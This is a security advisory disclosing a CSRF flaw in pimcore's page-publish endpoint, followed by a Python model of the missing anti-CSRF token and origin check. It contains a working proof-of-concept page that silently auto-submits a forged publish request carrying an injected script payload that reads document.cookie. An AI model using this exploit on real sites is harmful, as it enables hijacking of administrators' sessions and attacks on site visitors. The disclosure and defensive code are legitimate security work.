Cross-site Request Forgery (CSRF) in pimcore

2010-08-02T00:00:00
ID HTB22562
Type htbridge
Reporter High-Tech Bridge
Modified 2010-08-18T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in pimcore which could be exploited to perform cross-site request forgery attacks.

1) Cross-site Request Forgery (CSRF) in pimcore
The vulnerability exists due to insufficient validation of the request origin in /admin/page/save/task/publish: the endpoint accepts a publish request without verifying that it was intentionally submitted from the administrative interface. A remote attacker can create a specially crafted web page that silently submits such a request and trick a logged-in administrator into visiting it. Because the browser attaches the administrator's session cookie, the forged request saves and publishes attacker-controlled page content, so arbitrary HTML and script code is then executed in the browser of any user who views the published page, in the context of the vulnerable site. Successful exploitation requires that the victim is logged in and has access to the administrative interface.
Exploitation example:
<!-- Attacker-controlled page. The form targets the publish endpoint of the vulnerable site;
     "host" and the page id 1440 are placeholders for the real installation. -->
<form action="http://host/admin/page/save/task/publish" method="post" name="main" >
<!-- "data" is the JSON document of page elements the CMS will save and publish; the
     script payload is placed in the headernote and contentblock elements. The double
     quotes inside the JSON strings are backslash-escaped so the JSON remains valid. -->
<input type="hidden" name="data" value='{"headernote": {"data": "Powerful CMS\"><script>alert(document.cookie)</script>", "type": "textarea"}, "headline": {"data": "The truth about pimcore", "type": "input"}, "contentblock": {"data": ["1"], "type": "block"}, "blocktypecontentblock1": {"data": null, "type": "select"}, "sublinecontentblock1": {"data": "Content management ala pimcore", "type": "input"}, "contentcontentblock1": {"data": "<p>\n\tPimcore</p>\n\"><script>alert(document.cookie)</script>", "type": "wysiwyg"}}' />
<input type="hidden" name="id" value="1440" />
</form>
<script>
/* Submit the forged request as soon as the victim administrator's browser loads the page. */
document.main.submit();
</script>
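The missing control is a server-side check that a publish request really originated from the administrative interface. The following added example is not pimcore's code; it is a stand-alone Python model of that check. The site origin "http://host", the form field name csrf_token, the cookie name and the session layout are assumptions chosen for the demonstration. It binds an anti-CSRF token to the admin session, requires that token on the state-changing request, and rejects requests whose Origin (or, failing that, Referer) header does not match the site, failing closed when both headers are absent. The constructed requests at the bottom replay the advisory's attack against it.

```python
import hashlib
import hmac
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Hypothetical site origin; "host" is the advisory's placeholder hostname.
SITE_ORIGIN = "http://host"


def csrf_token(session: dict) -> str:
    """Derive a per-session anti-CSRF token from a secret the attacker never sees.

    The token is an HMAC over the session id keyed with a server-side secret,
    so a page on another origin can neither compute it nor read it.
    """
    return hmac.new(session["secret"], session["id"].encode(), hashlib.sha256).hexdigest()


def _origin_of(headers: dict) -> Optional[str]:
    """Return the requesting origin from Origin, else from Referer, else None."""
    h = {k.lower(): v for k, v in headers.items()}
    if "origin" in h:
        return h["origin"]
    if "referer" in h:
        p = urlsplit(h["referer"])
        if p.scheme and p.netloc:
            return f"{p.scheme}://{p.netloc}"
    return None


def authorize_publish(headers: dict, form: dict, session: dict) -> Tuple[bool, str]:
    """Decide whether a POST to /admin/page/save/task/publish may proceed.

    Order matters: authentication first, then origin, then the token, so the
    reason string tells an incident responder which control fired.
    """
    if not session.get("admin"):
        return False, "not an administrator session"
    origin = _origin_of(headers)
    if origin != SITE_ORIGIN:  # fails closed when both headers are absent
        return False, f"untrusted origin {origin!r}"
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be recovered byte by byte.
    if not hmac.compare_digest(csrf_token(session), supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample data for the demonstration (hypothetical session and cookie name).
ADMIN_SESSION = {"id": "sess-1440", "secret": b"server-side-secret", "admin": True}

# Legitimate save from the admin UI: same origin, token included.
LEGIT = (
    {"Origin": SITE_ORIGIN, "Cookie": "pimcore_admin_sid=sess-1440"},
    {"id": "1440", "data": "{}", "csrf_token": csrf_token(ADMIN_SESSION)},
)

# The advisory's attack: the auto-submitted form hosted on http://attacker.example.
# The browser attaches the admin cookie but sends the attacker's Origin and no token.
FORGED = (
    {"Origin": "http://attacker.example", "Cookie": "pimcore_admin_sid=sess-1440"},
    {"id": "1440", "data": '{"headernote": {"data": "<script>alert(document.cookie)</script>", "type": "textarea"}}'},
)

# Variant with Origin and Referer stripped (e.g. by a privacy extension): still rejected.
FORGED_NO_ORIGIN = ({"Cookie": "pimcore_admin_sid=sess-1440"}, FORGED[1])


if __name__ == "__main__":
    for name, (hdrs, form) in [("legit", LEGIT), ("forged", FORGED), ("forged-no-origin", FORGED_NO_ORIGIN)]:
        print(name, authorize_publish(hdrs, form, ADMIN_SESSION))
```

The origin check alone would have stopped the advisory's form post, since browsers set Origin on cross-site POSTs, but it is kept as defence in depth: the token is the primary control because Origin and Referer can be absent, while the token can only be obtained by a page that already runs on the site's own origin.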